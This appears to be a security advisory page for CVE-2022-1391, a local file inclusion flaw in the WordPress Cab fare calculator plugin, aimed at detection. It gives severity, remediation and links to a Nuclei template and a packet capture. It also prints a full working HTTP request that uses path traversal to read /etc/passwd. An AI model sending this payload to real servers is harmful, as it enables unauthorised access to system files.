🔙 목록으로 돌아가기

CVE-2022-1391: WordPress Cab fare calculator < 1.0.4 - Local File Inclusion

TitleWordPress Cab fare calculator < 1.0.4 - Local File Inclusion
AuthorSplint3r7
SeverityCritical
ImpactAn attacker can exploit this vulnerability to read sensitive files on the server, potentially exposing sensitive information.
RemediationUpdate to the latest version of the WordPress Cab fare calculator plugin (1.0.4) to fix the local file inclusion vulnerability.
CVSS Score9.8
EPSS Score0.66822
CVE IDCVE-2022-1391
CWE IDCWE-22
Tags cve cve2022 wordpress wp-plugin lfi wp edb wpscan kanev vkev vuln

🔍 Vulnerability Description

The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.

🌐 HTTP Request

GET /wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.8
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1391.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-1391.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A